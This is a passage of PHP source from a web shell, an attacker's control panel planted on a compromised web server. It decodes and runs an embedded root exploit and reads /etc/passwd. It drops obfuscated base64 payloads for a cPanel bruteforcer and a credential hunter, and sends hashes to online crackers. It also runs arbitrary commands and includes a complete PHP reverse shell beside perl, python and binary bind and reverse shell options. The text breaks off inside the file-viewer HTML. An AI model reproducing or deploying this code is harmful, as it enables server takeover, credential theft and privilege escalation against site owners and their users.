  988. $FullDir = "./exploit/autoroot.sh";
  989. $fh = fopen($FullDir, 'w') or die("can't open file");
  990. $AutoRoot = gzinflate(base64_decode($AutoRootScript));
  991. fwrite($fh, $AutoRoot);
  992. //exe("cd exploit;chmod 777 ".$myFile);
  993. $sploitresult = exe("cd exploit;sh ". $myFile);
  994. $s_result .= str_replace("\n","<br>",$sploitresult);
  995.  
  996. }
  997. }//Misc Options
  998. elseif(isset($_REQUEST['misc'])){
  999.  
  1000.  
  1001. foreach ($cmdaliases as $als) {
  1002. $sage .= '<option value='.htmlspecialchars($als[1]).">".htmlspecialchars($als[0])."</option>";
  1003. }
  1004.  
  1005. $s_result .= '<div class=\"mybox\"><h2>Built In Commands</h2><form method="post" action="'.$_SERVER['PHP_SELF']. '"><select name="exec" type=hidden>'. $sage .'</select><input type="hidden" type="submit" name="art" value="Get!"></div>';
  1006.  
  1007.  
  1008. $s_result .= "<table class=\"myboxtbl\">
  1009. </table>
  1010. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1011. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1012. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1013. </form>
  1014. </div>";
  1015.  
  1016.  
  1017.  
  1018.  
  1019. /*$s_result .= "<div class=\"mybox\"><h2>Find All Writeable Directorys</h2>
  1020. <form action=\"" . $_SERVER['PHP_SELF'] . "?fwt&d= \" method=\"post\" />
  1021. <table class=\"myboxtbl\">
  1022. </table>
  1023. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1024. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1025. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1026. </form>
  1027. </div>";
  1028.  
  1029. $s_result .= "<div class=\"mybox\"><h2>Find All Conf Files</h2>
  1030. <form action=\"" . $_SERVER['PHP_SELF'] . "?conf&d= \" method=\"post\" />
  1031. <table class=\"myboxtbl\">
  1032. </table>
  1033. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1034. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1035. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1036. </form>
  1037. </div>";*/
  1038.  
  1039. $s_result .= "<div class=\"mybox\"><h2>List Domains (Also Gets Path To Site) *Only Works With Valiases</h2>
  1040. <form action=\"" . $_SERVER['PHP_SELF'] . "?named&d= \" method=\"post\" />
  1041. <table class=\"myboxtbl\">
  1042. </table>
  1043. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1044. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1045. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1046. </form>
  1047. </div>";
  1048.  
  1049. $s_result .= "<div class=\"mybox\"><h2>List Passwd File</h2>
  1050. <form action=\"" . $_SERVER['PHP_SELF'] . "?passwd&d= \" method=\"post\" />
  1051. <table class=\"myboxtbl\">
  1052. </table>
  1053. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1054. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1055. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1056. </form>
  1057. </div>";
  1058.  
  1059. $s_result .= "<div class=\"mybox\"><h2>Find Other Shells</h2>
  1060. <form action=\"" . $_SERVER['PHP_SELF'] . "?malw&d= \" method=\"post\" />
  1061. <table class=\"myboxtbl\">
  1062. </table>
  1063. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1064. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1065. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1066. </form>
  1067. </div>";
  1068.  
  1069.  
  1070. $s_result .= "<div class=\"mybox\"><h2>Cpanel Bruteforcer</h2>
  1071. <form action=\"" . $_SERVER['PHP_SELF'] . "?cpnl&d= \" method=\"post\" />
  1072. <table class=\"myboxtbl\">
  1073. </table>
  1074. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1075. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1076. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1077. </form>
  1078. </div>";
  1079.  
  1080.  
  1081. $s_result .= "<div class=\"mybox\"><h2>Db/Cpanel/FTP Hunter</h2>
  1082. <form action=\"" . $_SERVER['PHP_SELF'] . "?hunt&d= \" method=\"post\" />
  1083. <table class=\"myboxtbl\">
  1084. </table>
  1085. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1086. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1087. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1088. </form>
  1089. </div>";
  1090.  
  1091.  
  1092.  
  1093. $s_result .= "<div class=\"mybox\"><h2>Please Enter md5 hash to the textbox below</h2>
  1094. <form action=\"" . $_SERVER['PHP_SELF'] . "?hash\" method=\"post\" />
  1095. <table class=\"myboxtbl\">
  1096. <tr>MD5: <td><input style=\"width:50%;\" class=\"inputz\" type=\"text\" name=\"hash\" value=\"".$rsport1."\" /></td></tr>
  1097. </table>
  1098. <input type=\"submit\" name=\"submit\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1099. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1100. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1101. </form>
  1102. </div>";
  1103.  
  1104. }
  1105.  
  1106. elseif(isset($_REQUEST['hash'])){
  1107.  
  1108. $city = strtolower(trim($_POST["hash"]));
  1109.  
  1110. if(ereg("([0-9a-f]{32})", $city)) {
  1111. $urls = array(
  1112. 0 => ("http://md5.rednoize.com/?p&s=md5&q=" . $city),
  1113. 1 => ("http://gdataonline.com/qkhash.php?mode=txt&hash=" . $city),
  1114. 2 => ("http://milw0rm.com/cracker/search.php"),
  1115. 3 => ("http://md5decryption.com/"),
  1116. 4 => ("http://alimamed.pp.ru/md5/?md5e=&md5d=" . $city),
  1117. 5 => ("http://ice.breaker.free.fr/md5.php?hachage=" . $city),
  1118. 6 => ("http://passcracking.com/"),
  1119. 7 => ("http://md5.hashcracking.com/search.php?md5=" . $city),
  1120. 8 => ("http://www.hashchecker.com/index.php?_sls=search_hash"),
  1121. 9 => ("http://md5crack.it-helpnet.de/index.php?op=search"),
  1122. 10 => ("http://blacklight.gotdns.org/cracker/crack.php"),
  1123. 11 => ("http://md5.ip-domain.com.cn/"),
  1124. 12 => ("http://www.bigtrapeze.com/md5/"),
  1125. 13 => ("http://opencrack.hashkiller.com/"),
  1126. 14 => ("http://www.md5oogle.com/decrypt.php?input=" . $city),
  1127. 15 => ("http://www.tydal.nu/php/sakerhet/md5.php?q=" . $city)
  1128. );
  1129.  
  1130. $params = array(
  1131. 0 => (null),
  1132. 1 => (null),
  1133. 2 => ("hash=" . $city . "&submit=Submit"),
  1134. 3 => ("hash=" . $city . "&submit=Decrypt It!"),
  1135. 4 => (null),
  1136. 5 => (null),
  1137. 6 => ("datafromuser=" . $city . "&submit=DoIT"),
  1138. 7 => (null),
  1139. 8 => ("search_field=" . $city . "&Submit=search"),
  1140. 9 => ("md5=" . $city . "&submit=Search now"),
  1141. 10 => ("hash=" . $city . "&algos=MD5&crack=Crack"),
  1142. 11 => ("text=" . $city . "&submit=submit"),
  1143. 12 => ("query=" . $city . "&submit= Crack "),
  1144. 13 => ("oc_check_md5=" . $city ."&oc_submit=Search MD5"),
  1145. 14 => (null),
  1146. 15 => (null)
  1147. );
  1148.  
  1149. $patterns = array(
  1150. 0 => (null),
  1151. 1 => ("/<\/td><td width=\"35%\"><b>(.*)<\/b><\/td><\/tr>/"),
  1152. 2 => ("/<\/TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>(.*)<\/TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>cracked<\/TD><\/TR>/"),
  1153. 3 => ("/<h2>Results<\/h2><b>Md5 Hash:<\/b> " . $city . "<br\/><b class='red'>Normal Text: <\/b>(.*)<br\/>/"),
  1154. 4 => ("/: <b>(.*)<\/b><br><form action=\"\">/"),
  1155. 5 => ("/: <b><br \/><br \/> - (.*)<\/b>/"),
  1156. 6 => ("/<\/td><td>md5 Database<\/td><td>" . $city . "<\/td><td bgcolor=#FF0000>(.*)<\/td><td>/"),
  1157. 7 => ("/Cleartext of " . $city . " is (.*)/"),
  1158. 8 => ("/<td><li>Your md5 hash is :<br><li>" . $city . " is <b>(.*)<\/b> used charl/"),
  1159. 9 => ("/<\/td><td>" . $city . "<\/td><td>(.*)<\/td>/"),
  1160. 10 => ("/" . $city . " -> <b>(.*)<\/b><br><br>/"),
  1161. 11 => ("/<strong>result:<\/strong><font color=red>(.*)<\/font> /"),
  1162. 12 => ("/The hash <strong>" . $city . "<\/strong> has been deciphered to: <strong>(.*)<\/strong>/"),
  1163. 13 => ("/<\/div><div class=\"result\">" . $city . ":(.*)<br\/>/"),
  1164. 14 => ("/<br\/><center><div style=\"background: lightblue;\"><b>Result: (.*)<\/b><br \/><\/div><\/center><br \/>/"),
  1165. 15 => ("/(.*)<\/b><\/h5>/")
  1166. );
  1167.  
  1168. if((count($urls) !== count($params)) || (count($urls) !== count($patterns)) || (count($params) !== count($patterns))) { die("Error"); }
  1169.  
  1170. for($i = 0; $i < count($urls); $i++) {
  1171. // echo "\n<br>\n";
  1172.  
  1173. $url = $urls[$i];
  1174. $param = $params[$i];
  1175. $pattern = $patterns[$i];
  1176.  
  1177. $message = ereg_replace("(http|https)://", null, $url);
  1178. $message = ereg_replace("/(.*)", null, $message);
  1179.  
  1180. $ch = curl_init();
  1181. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, "4");
  1182. if(!empty($param)) {
  1183. curl_setopt($ch, CURLOPT_POST, 1);
  1184. curl_setopt($ch, CURLOPT_POSTFIELDS, $param);
  1185. }
  1186. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1187. curl_setopt($ch, CURLOPT_URL, $url);
  1188. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  1189. curl_setopt($ch, CURLOPT_TIMEOUT, "4");
  1190. $result = @curl_exec($ch);
  1191. curl_close($ch);
  1192.  
  1193. if(!empty($result)) {
  1194. if(empty($pattern)) {
  1195. $final = $result;
  1196. } else {
  1197. preg_match($pattern, $result, $final);
  1198. $final = $final[1];
  1199. }
  1200. }
  1201.  
  1202. $s_result .= (md5($final) === $city || md5(htmlentities($final)) === $city)?("[+]" . $message . ": <b>" . htmlentities($final) . "</b><br>"):("[-]" . $message . ": Not Found<br>");
  1203. }
  1204. }
  1205. }
  1206. // Find Directory
  1207. elseif(isset($_REQUEST['fwt'])){
  1208. $lul = exe("find / -perm -2 ! -type l -ls");
  1209. $lul = str_replace("\n", "<br>", $lul);
  1210. $s_result .= $lul;
  1211.  
  1212. }//Log Hunter (all types)
  1213. elseif(isset($_REQUEST['hunt'])){
  1214. $FullDir = "cpnl.php";
  1215. $fh = fopen($FullDir, 'w') or die("can't open file");
  1216. $SymlinkScript = gzinflate(base64_decode($CpFtpDbFinder ));
  1217. fwrite($fh, $SymlinkScript);
  1218. $s_result .= '<iframe id="myframe" src="cpnl.php" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0" style="overflow:visible; width:100%; display:none"></iframe>';
  1219.  
  1220. }
  1221. //Cpanel Cracker
  1222. elseif(isset($_REQUEST['cpnl'])){
  1223. $FullDir = "cpnl.php";
  1224. $fh = fopen($FullDir, 'w') or die("can't open file");
  1225. $SymlinkScript = gzinflate(base64_decode($CpanelFinder));
  1226. fwrite($fh, $SymlinkScript);
  1227. $s_result .= '<iframe id="myframe" src="cpnl.php" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0" style="overflow:visible; width:100%; display:none"></iframe>';//'<iframe src="'. getBaseUrl().'sql.php"></iframe>';
  1228.  
  1229. }
  1230. elseif(isset($_REQUEST['passwd'])){
  1231. $lul = exe("cat /etc/passwd");
  1232. $lul = str_replace("\n", "<br>", $lul);
  1233. $s_result .= $lul;
  1234. }
  1235. elseif(isset($_REQUEST['named'])){
  1236. GetNamed();
  1237. $s_result .= $prepage. $postpage;
  1238. }
  1239. elseif(isset($_REQUEST['alic'])){
  1240. $user = $_POST['user'];
  1241. $usr = str_replace("<br/>","",$user);
  1242. $u = exe("ls -la /etc/valiases/". $usr);
  1243. $linz = explode(' ', $u);
  1244. GetNamed();
  1245. getuserpath();
  1246. $s_result .= "Site: ".'<a href="http://'. $usr. '" target="_blank">'. $usr."</a><br>" ."Username: ". $linz[2]. "<br>Path: ".$prepath. $linz[2]."/".$postpath."/". $prepage. $postpage;
  1247. }
  1248. elseif(isset($_REQUEST['conf'])){
  1249. $lul = exe("find / -name *conf*");
  1250. $lul = str_replace("\n", "<br>", $lul);
  1251. $s_result .= $lul;
  1252. }
  1253. // working with database
  1254. elseif(isset($_REQUEST['act'])){
  1255. if(file_exists($pwd.ss('sql.php'))){
  1256. exe("rm -rf sql.php");
  1257. $s_result .= 'SQL Manager Removed!';
  1258. //echo 'lololz';
  1259. }else{
  1260. $FullDir = "sql.php";
  1261. $fh = fopen($FullDir, 'w') or die("can't open file");
  1262. $SymlinkScript = gzinflate(base64_decode($SQLMan));
  1263. fwrite($fh, $SymlinkScript);
  1264. $s_result .= '<iframe id="myframe" src="sql.php" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0" style="overflow:visible; width:100%; display:none"></iframe>';//'<iframe src="'. getBaseUrl().'sql.php"></iframe>';
  1265. }//}
  1266.  
  1267. }// Find Malware (shells)
  1268. elseif(isset($_REQUEST['malw'])){
  1269. $FullDir = "malware.php";
  1270. $fh = fopen($FullDir, 'w') or die("can't open file");
  1271. $SymlinkScript = gzinflate(base64_decode($ShellFinder));
  1272. fwrite($fh, $SymlinkScript);
  1273. $s_result .= '<iframe id="myframe" src="malware.php" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0" style="overflow:visible; width:100%; display:none"></iframe>';
  1274.  
  1275. }
  1276. //execute command {from list}
  1277. elseif(isset($_REQUEST['exec'])){
  1278. $rslt = $_POST['exec'];
  1279. $rslt = str_replace("_"," ",$rslt);
  1280. //$s_result .= trim($rslt);
  1281. $rslt .= exe($rslt);
  1282. $rslt = str_replace("\n","<br>",$rslt);
  1283. $s_result .= $rslt;
  1284. }
  1285. // bind and reverse shell
  1286. elseif(isset($_REQUEST['rs'])){
  1287. $rshost = $s_server_ip;
  1288. $rstarget = "";
  1289. $d = $pwd;
  1290. if(isset($_REQUEST['d'])) $d = ss($_REQUEST['d']);
  1291.  
  1292. $rsport = "13123";
  1293. // resources $xback_pl $xbind_pl $xback_c $xbind_c $xmulti_py $wmulti_c
  1294. $rspesan = "Press &#39; Go ! &#39; button and run &#39; nc <i>server_ip</i> <i>port</i> &#39; on your computer";
  1295. $rspesanb = "Run &#39; nc -l -v -p <i>port</i> &#39; on your computer and press &#39; Go ! &#39; button";
  1296.  
  1297. $rsport1 = $rsport;
  1298. $rsport2 = $rsport;
  1299. $rsport3 = $rsport;
  1300.  
  1301. if(isset($_REQUEST['xbind_pl'])){
  1302. if(isset($_REQUEST['sqlport1'])) $rsport1 = ss($_REQUEST['sqlport1']);
  1303. $rstarget = $rsport1;
  1304. $rsres = rs($s_win, cp($d), "xbind_pl" ,$xbind_pl, $rstarget);
  1305. $s_result .= $rsres;
  1306. }
  1307. if(isset($_REQUEST['xbind_py'])){
  1308. if(isset($_REQUEST['sqlport2'])) $rsport2 = ss($_REQUEST['sqlport2']);
  1309. $rstarget = $rsport2;
  1310. $rsres = rs($s_win, cp($d), "xbind_py" ,$xmulti_py, $rstarget);
  1311. $s_result .= $rsres;
  1312. }
  1313. if(isset($_REQUEST['xbind_bin'])){
  1314. if(isset($_REQUEST['sqlport3'])) $rsport3 = ss($_REQUEST['sqlport3']);
  1315. $rstarget = $rsport3;
  1316. if(!$s_win) $rsres = rs($s_win, cp($d), "xbind_bin" ,$xbind_c, $rstarget);
  1317. else $rsres = rs($s_win, cp($d), "xbind_bin" ,$wmulti_c, $rstarget);
  1318. $s_result .= $rsres;
  1319. }
  1320.  
  1321. $rsportb1 = $rsport;
  1322. $rsportb2 = $rsport;
  1323. $rsportb3 = $rsport;
  1324. $rsportb4 = $rsport;
  1325. $rstarget1 = $s_my_ip;
  1326. $rstarget2 = $s_my_ip;
  1327. $rstarget3 = $s_my_ip;
  1328. $rstarget4 = $s_my_ip;
  1329.  
  1330. if(isset($_REQUEST['xback_pl'])){
  1331. if(isset($_REQUEST['sqlportb1'])) $rsportb1 = ss($_REQUEST['sqlportb1']);
  1332. if(isset($_REQUEST['rstarget1'])) $rstarget1 = ss($_REQUEST['rstarget1']);
  1333.  
  1334. $rstarget = $rsportb1." ".$rstarget1;
  1335. $rsres = rs($s_win, cp($d), "xback_pl" ,$xback_pl, $rstarget);
  1336. $s_result .= $rsres;
  1337.  
  1338. }
  1339. if(isset($_REQUEST['xback_py'])){
  1340. if(isset($_REQUEST['sqlportb2'])) $rsportb2 = ss($_REQUEST['sqlportb2']);
  1341. if(isset($_REQUEST['rstarget2'])) $rstarget2 = ss($_REQUEST['rstarget2']);
  1342.  
  1343. $rstarget = $rsportb2." ".$rstarget2;
  1344. $rsres = rs($s_win, cp($d), "xback_py" ,$xmulti_py, $rstarget);
  1345. $s_result .= $rsres;
  1346. }
  1347. if(isset($_REQUEST['xback_bin'])){
  1348. if(isset($_REQUEST['sqlportb3'])) $rsportb3 = ss($_REQUEST['sqlportb3']);
  1349. if(isset($_REQUEST['rstarget3'])) $rstarget3 = ss($_REQUEST['rstarget3']);
  1350.  
  1351. $rstarget = $rsportb3." ".$rstarget3;
  1352. if(!$s_win) $rsres = rs($s_win, cp($d), "xback_bin" ,$xback_c, $rstarget);
  1353. else $rsres = rs($s_win, cp($d), "xback_bin" ,$wmulti_c, $rstarget);
  1354. $s_result .= $rsres;
  1355. }
  1356. if(isset($_REQUEST['xback_php'])){
  1357. if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
  1358. if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
  1359. $ip = $rstarget4;
  1360. $port = $rsportb4;
  1361. $chunk_size = 1337;
  1362. $write_a = null;
  1363. $error_a = null;
  1364. $shell = '/bin/sh';
  1365. $daemon = 0;
  1366. $debug = 0;
  1367. if(function_exists('pcntl_fork')){
  1368. $pid = pcntl_fork();
  1369. if ($pid == -1) exit(1);
  1370. if ($pid) exit(0);
  1371. if (posix_setsid() == -1) exit(1);
  1372. $daemon = 1;
  1373. }
  1374. umask(0);
  1375. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  1376. if(!$sock) exit(1);
  1377. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
  1378. $process = proc_open($shell, $descriptorspec, $pipes);
  1379. if(!is_resource($process)) exit(1);
  1380. stream_set_blocking($pipes[0], 0);
  1381. stream_set_blocking($pipes[1], 0);
  1382. stream_set_blocking($pipes[2], 0);
  1383. stream_set_blocking($sock, 0);
  1384. while(1){
  1385. if(feof($sock)) break;
  1386. if(feof($pipes[1])) break;
  1387. $read_a = array($sock, $pipes[1], $pipes[2]);
  1388. $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  1389. if(in_array($sock, $read_a)){
  1390. $input = fread($sock, $chunk_size);
  1391. fwrite($pipes[0], $input);
  1392. }
  1393. if(in_array($pipes[1], $read_a)){
  1394. $input = fread($pipes[1], $chunk_size);
  1395. fwrite($sock, $input);
  1396. }
  1397. if(in_array($pipes[2], $read_a)){
  1398. $input = fread($pipes[2], $chunk_size);
  1399. fwrite($sock, $input);
  1400. }
  1401. }
  1402. fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);
  1403. proc_close($process);
  1404. $rsres = " ";
  1405. $s_result .= $rsres;
  1406. }
  1407. $s_result .= "<div class=\"mybox\"><h2>Bind shell ( perl )</h2>
  1408. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
  1409. <table class=\"myboxtbl\">
  1410. <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost1\"
  1411. value=\"".$rshost."\" /></td></tr>
  1412. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport1\" value=\"".$rsport1."\" /></td></tr>
  1413. </table>
  1414. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1415. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1416. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1417. </form>
  1418. </div>";
  1419. $s_result .= "<div class=\"mybox\"><h2>Bind shell ( python )</h2>
  1420. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
  1421. <table class=\"myboxtbl\">
  1422. <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost\"
  1423. value=\"".$rshost."\" /></td></tr>
  1424. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport2\" value=\"".$rsport2."\" /></td></tr>
  1425. </table>
  1426. <input type=\"submit\" name=\"xbind_py\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1427. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1428. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1429. </form>
  1430. </div>";
  1431. $s_result .= "<div class=\"mybox\"><h2>Bind shell ( bin )</h2>
  1432. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
  1433. <table class=\"myboxtbl\">
  1434. <tr><td style=\"width:100px;\">Server IP</td><td><input disabled=\"disabled\" style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rshost\"
  1435. value=\"".$rshost."\" /></td></tr>
  1436. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlport3\" value=\"".$rsport3."\" /></td></tr>
  1437. </table>
  1438. <input type=\"submit\" name=\"xbind_bin\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1439. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  1440. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1441. </form>
  1442. </div>";
  1443. $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( perl )</h2>
  1444. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
  1445. <table class=\"myboxtbl\">
  1446. <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget1\" value=\"".$rstarget1."\"
  1447. /></td></tr>
  1448. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb1\" value=\"".$rsportb1."\" /></td></tr>
  1449. </table>
  1450. <input type=\"submit\" name=\"xback_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1451. &nbsp;&nbsp;<span id=\"rs1\">".$rspesanb."</span>
  1452. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1453. </form>
  1454. </div>";
  1455. $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( python )</h2>
  1456. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
  1457. <table class=\"myboxtbl\">
  1458. <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget2\" value=\"".$rstarget2."\"
  1459. /></td></tr>
  1460. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb2\" value=\"".$rsportb2."\" /></td></tr>
  1461. </table>
  1462. <input type=\"submit\" name=\"xback_py\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1463. &nbsp;&nbsp;<span id=\"rs1\">".$rspesanb."</span>
  1464. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1465. </form>
  1466. </div>";
  1467. $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( bin )</h2>
  1468. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
  1469. <table class=\"myboxtbl\">
  1470. <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget3\" value=\"".$rstarget3."\"
  1471. /></td></tr>
  1472. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb3\" value=\"".$rsportb3."\" /></td></tr>
  1473. </table>
  1474. <input type=\"submit\" name=\"xback_bin\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1475. &nbsp;&nbsp;<span id=\"rs1\">".$rspesanb."</span>
  1476. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1477. </form>
  1478. </div>";
  1479. $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( php )</h2>
  1480. <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
  1481. <table class=\"myboxtbl\">
  1482. <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget4\" value=\"".$rstarget4."\"
  1483. /></td></tr>
  1484. <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb4\" value=\"".$rsportb4."\" /></td></tr>
  1485. </table>
  1486. <input type=\"submit\" name=\"xback_php\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  1487. &nbsp;&nbsp;<span id=\"rs1\">".$rspesanb."</span>
  1488. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1489. </form>
  1490. </div>";
  1491. } // view file
  1492. elseif(isset($_REQUEST['view'])){
  1493. $f = ss($_REQUEST['view']);
  1494. if(isset($fnew) && (trim($fnew)!="")) $f = $fnew;
  1495.  
  1496. if(is_file($f)){
  1497. if(!$s_win && $s_posix){
  1498. $name = posix_getpwuid(fileowner($f));
  1499. $group = posix_getgrgid(filegroup($f));
  1500. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  1501. }
  1502. else {
  1503. $owner = $s_user;
  1504. }
  1505. $filn = basename($f);
  1506. $s_result .= "<table class=\"viewfile\" style=\"width:100%;\">
  1507. <tr><td style=\"width:140px;\">Filename</td><td><span id=\"".cs($filn)."_link\">".$f."</span>
  1508. <form action=\"" . $_SERVER['PHP_SELF'] . "?d=".$pwd."&amp;view=".$f."\" method=\"post\" id=\"".cs($filn)."_form\" class=\"sembunyi\"
  1509. style=\"margin:0;padding:0;\">
  1510. <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  1511. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  1512. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  1513. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  1514. onclick=\"dragon('".cs($filn)."_link','".cs($filn)."_form');\" />
  1515. </form>
  1516. </td></tr>
  1517. <tr><td>Size</td><td>".gs($f)."</td></tr>
  1518. <tr><td>Permission</td><td>".gp($f)."</td></tr>
  1519. <tr><td>Owner</td><td>".$owner."</td></tr>
  1520. <tr><td>Create time</td><td>".date("d-M-Y H:i",filectime($f))."</td></tr>
  1521. <tr><td>Last modified</td><td>".date("d-M-Y H:i",filemtime($f))."</td></tr>
  1522. <tr><td>Last accessed</td><td>".date("d-M-Y H:i",fileatime($f))."</td></tr>
  1523. <tr><td>Actions</td><td>
  1524. <a href=\"?d=".$pwd."&amp;edit=".$f."\">edit</a> |
  1525. <a href=\"javascript:dragon('".cs($filn)."_link','".cs($filn)."_form');\">rename</a> |
  1526. <a href=\"?d=".$pwd."&amp;delete=".$f."\">delete</a> |
  1527. <a href=\"?d=".$pwd."&amp;dl=".$f."\">download</a>&nbsp;(<a href=\"?d=".$pwd."&amp;dlgzip=$f\">gzip</a>)</td></tr>
  1528. <tr><td>View</td><td>
  1529. <a href=\"?d=".$pwd."&amp;view=".$f."&amp;type=text\">text</a> |
  1530. <a href=\"?d=".$pwd."&amp;view=".$f."&amp;type=code\">code</a> |
